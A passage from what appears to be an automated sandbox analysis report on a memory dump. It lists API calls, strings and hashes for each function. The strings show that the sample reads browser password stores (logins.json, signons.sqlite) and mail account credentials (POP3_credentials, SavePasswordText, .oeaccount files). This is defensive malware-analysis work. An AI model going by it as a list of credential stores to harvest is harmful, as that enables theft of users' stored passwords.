                                    • Instruction Fuzzy Hash: DB012D01545A4179FF21AAB50C02ABB5F8CDA23364B145B4BF750CB293DB5CC90693FE
                                    APIs
                                    • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,0044B41C,0044B405), ref: 0044B43E
                                    • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,0044B41C,0044B405), ref: 0044B452
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: ProtectVirtual
                                    • String ID:
                                    • API String ID: 544645111-0
                                    • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                    • Instruction ID: 565c9894d902a96607ae12053a83652f4dbbb150929c791eaa1536a67b179355
                                    • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                    • Instruction Fuzzy Hash: 83F0C201589A407DFE2155B50C42ABB5B8CCA27320B244B07F654CB383D79DC91A93FA
                                    APIs
                                      • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                    • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: Library$AddressFreeLoadProc
                                    • String ID:
                                    • API String ID: 145871493-0
                                    • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                    • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                    • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                    • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                    APIs
                                    • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                      • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                      • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                      • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: PrivateProfile$StringWrite_itoamemset
                                    • String ID:
                                    • API String ID: 4165544737-0
                                    • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                    • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                    • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                    • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                    APIs
                                    • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: FreeLibrary
                                    • String ID:
                                    • API String ID: 3664257935-0
                                    • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                    • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                    • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                    • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                    APIs
                                    • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                    • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                    • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                    • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                    APIs
                                    • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: FreeLibrary
                                    • String ID:
                                    • API String ID: 3664257935-0
                                    • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                    • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                    • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                    • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                    APIs
                                    • EnumResourceNamesA.KERNEL32(?,?,Function_00010C68,00000000), ref: 00410D02
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: EnumNamesResource
                                    • String ID:
                                    • API String ID: 3334572018-0
                                    • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                    • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                                    • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                    • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                                    APIs
                                    • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: CloseFind
                                    • String ID:
                                    • API String ID: 1863332320-0
                                    • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                    • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                    • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                    • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                    APIs
                                    • RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: Open
                                    • String ID:
                                    • API String ID: 71445658-0
                                    • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                    • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                    • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                    • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                    APIs
                                    • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: AttributesFile
                                    • String ID:
                                    • API String ID: 3188754299-0
                                    • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                    • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                    • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                    • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                    APIs
                                    • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                    • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                    • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                    • LoadCursorA.USER32(00000067), ref: 0040115F
                                    • SetCursor.USER32(00000000,?,?), ref: 00401166
                                    • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                    • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                    • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                    • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                    • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                    • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                    • EndDialog.USER32(?,00000001), ref: 0040121A
                                    • DeleteObject.GDI32(?), ref: 00401226
                                    • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                    • ShowWindow.USER32(00000000), ref: 00401253
                                    • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                    • ShowWindow.USER32(00000000), ref: 00401262
                                    • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                    • memset.MSVCRT ref: 0040128E
                                    • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                    • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                    • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                    • String ID:
                                    • API String ID: 2998058495-0
                                    • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                    • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                    • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                    • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: _mbscat$memsetsprintf$_mbscpy
                                    • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                    • API String ID: 633282248-1996832678
                                    • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                    • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                    • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                    • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: sprintf$memset$_mbscpy
                                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                    • API String ID: 3402215030-3842416460
                                    • Opcode ID: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                    • Instruction ID: f20d4583fe87a1bfbd8f178ed5e4bb51106c12545e3cf4f5d6ab8081ed6cb500
                                    • Opcode Fuzzy Hash: a1375856f58305cbc92444a301f89f903b2e6d760937f4398232927644d79174
                                    • Instruction Fuzzy Hash: 2E4152B2C0115D6AEB21EB54DC42FEA776CEF54308F0401E7B619E2152E278AB988B65
                                    APIs
                                      • Part of subcall function 00407B29: GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040F0E7,?,?,?,?), ref: 00407B42
                                      • Part of subcall function 00407B29: CloseHandle.KERNEL32(00000000,?,?,?), ref: 00407B6E
                                      • Part of subcall function 004080D4: ??3@YAXPAX@Z.MSVCRT ref: 004080DB
                                      • Part of subcall function 00407035: _mbscpy.MSVCRT ref: 0040703A
                                      • Part of subcall function 00407035: strrchr.MSVCRT ref: 00407042
                                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAE3
                                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DAF7
                                      • Part of subcall function 0040DAC2: memset.MSVCRT ref: 0040DB0B
                                      • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DBD8
                                      • Part of subcall function 0040DAC2: memcpy.MSVCRT ref: 0040DC38
                                      • Part of subcall function 0040F036: _mbsicmp.MSVCRT ref: 0040F07F
                                    • strlen.MSVCRT ref: 0040F139
                                    • strlen.MSVCRT ref: 0040F147
                                    • memset.MSVCRT ref: 0040F187
                                    • strlen.MSVCRT ref: 0040F196
                                    • strlen.MSVCRT ref: 0040F1A4
                                    • memset.MSVCRT ref: 0040F1EA
                                    • strlen.MSVCRT ref: 0040F1F9
                                    • strlen.MSVCRT ref: 0040F207
                                    • _strcmpi.MSVCRT ref: 0040F2B2
                                    • _mbscpy.MSVCRT ref: 0040F2CD
                                    • _mbscpy.MSVCRT ref: 0040F30E
                                      • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                                      • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: strlen$memset$_mbscpy$memcpy$??3@CloseFileHandleSize_mbscat_mbsicmp_strcmpistrrchr
                                    • String ID: logins.json$none$signons.sqlite$signons.txt
                                    • API String ID: 1613542760-3138536805
                                    • Opcode ID: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                    • Instruction ID: 4390ea688f3eb6ff8deec26b973fceccf030c6f24aada76a9830730871e88cce
                                    • Opcode Fuzzy Hash: ee10521dd79ee73122fc0f876785dd9113831bb39c60f606fe2404f3e43330c8
                                    • Instruction Fuzzy Hash: 5261F671504605AED724EB70CC81BDAB3E8AF14314F1405BFE599E30C1EB78BA89CB99
                                    APIs
                                    • LoadLibraryA.KERNEL32(psapi.dll,?,0040FE19), ref: 00410047
                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 00410060
                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 00410071
                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 00410082
                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00410093
                                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 004100A4
                                    • FreeLibrary.KERNEL32(00000000), ref: 004100C4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: AddressProc$Library$FreeLoad
                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                    • API String ID: 2449869053-232097475
                                    • Opcode ID: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                    • Instruction ID: dd2e46225b8bbf3860c07ad768741e6abff990e6b314fd3472572f6830733abf
                                    • Opcode Fuzzy Hash: ea82c00efb8b675967e90ca7ea1b3b2de08eeb41589313c02842f66110c29472
                                    • Instruction Fuzzy Hash: 6E0144399017426AE7226B29BC51B6B3EB89B4DB01B15007BE400E2352DBFCD8C0CF5E
                                    APIs
                                    • strchr.MSVCRT ref: 004100E4
                                    • _mbscpy.MSVCRT ref: 004100F2
                                      • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                      • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                      • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                    • _mbscpy.MSVCRT ref: 00410142
                                    • _mbscat.MSVCRT ref: 0041014D
                                    • memset.MSVCRT ref: 00410129
                                      • Part of subcall function 0040715B: GetWindowsDirectoryA.KERNEL32(0045AA00,00000104,?,00410182,00000000,?,00000000,00000104,00000104), ref: 00407170
                                      • Part of subcall function 0040715B: _mbscpy.MSVCRT ref: 00407180
                                    • memset.MSVCRT ref: 00410171
                                    • memcpy.MSVCRT ref: 0041018C
                                    • _mbscat.MSVCRT ref: 00410197
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: _mbscpy$_mbscatmemsetstrlen$DirectoryWindows_memicmpmemcpystrchr
                                    • String ID: \systemroot
                                    • API String ID: 912701516-1821301763
                                    • Opcode ID: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                    • Instruction ID: fda7f57b1b0f7358cef9bf297f3eeb801234e423e358f1bd4862c9dba8460d26
                                    • Opcode Fuzzy Hash: f8a886503ef803f3ee0bfd3d9e760fda2e58d4ed4af484f5670658ee78c777d3
                                    • Instruction Fuzzy Hash: 3721AA7590C28479F724E2618C83FEA679CDB55704F50405FB2C9A51C1EAECF9C5862A
                                    APIs
                                      • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                    • strchr.MSVCRT ref: 0040327B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: PrivateProfileStringstrchr
                                    • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                    • API String ID: 1348940319-1729847305
                                    • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                    • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                    • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                    • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memcpy
                                    • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                    • API String ID: 3510742995-3273207271
                                    • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                    • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                    • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                    • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memcpymemset
                                    • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                    • API String ID: 1297977491-3883738016
                                    • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                    • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                    • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                    • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                    APIs
                                    • memset.MSVCRT ref: 0040810E
                                      • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                      • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                      • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                      • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                    • LocalFree.KERNEL32(?,?,?,?,?,00000000,7508EB20,?), ref: 004081B9
                                      • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                      • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                      • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                    • String ID: POP3_credentials$POP3_host$POP3_name
                                    • API String ID: 524865279-2190619648
                                    • Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                    • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                    • Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                    • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                    APIs
                                      • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                    • ??2@YAPAXI@Z.MSVCRT ref: 004441C2
                                    • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                      • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                      • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                      • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                      • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                      • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                      • Part of subcall function 00444059: memcpy.MSVCRT ref: 004440EB
                                      • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                                    • ??3@YAXPAX@Z.MSVCRT ref: 004441FC
                                    • CloseHandle.KERNEL32(?), ref: 00444206
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                    • String ID: ACD
                                    • API String ID: 1886237854-620537770
                                    • Opcode ID: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
                                    • Instruction ID: 993b87d0760cedec04f170bc8e4db420e9372e17061e8bf8474e84fbc22352e0
                                    • Opcode Fuzzy Hash: 14acd5922900dc7186521c5d2cf315890d497fea2d0f8e510365f992a0e5d2d7
                                    • Instruction Fuzzy Hash: 9201D836401248BEF7106F75AC8ED9B7BACEF96368710812BF854971A1DA359C14CA64
                                    APIs
                                    • memset.MSVCRT ref: 004091EC
                                    • sprintf.MSVCRT ref: 00409201
                                      • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                      • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                      • Part of subcall function 0040929C: _mbscpy.MSVCRT ref: 004092FC
                                    • SetWindowTextA.USER32(?,?), ref: 00409228
                                    • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000E.00000002.3202052507.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                    • String ID: caption$dialog_%d
                                    • API String ID: 2923679083-4161923789
                                    • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                    • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                    • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                    • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                    APIs
                                    • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                    • memset.MSVCRT ref: 00410246
                                    • memset.MSVCRT ref: 00410258
                                      • Part of subcall function 004100CC: _mbscpy.MSVCRT ref: 004100F2
                                    • memset.MSVCRT ref: 0041033F
                                    • _mbscpy.MSVCRT ref: 00410364
                                    • CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
                                    Memory Dump Source
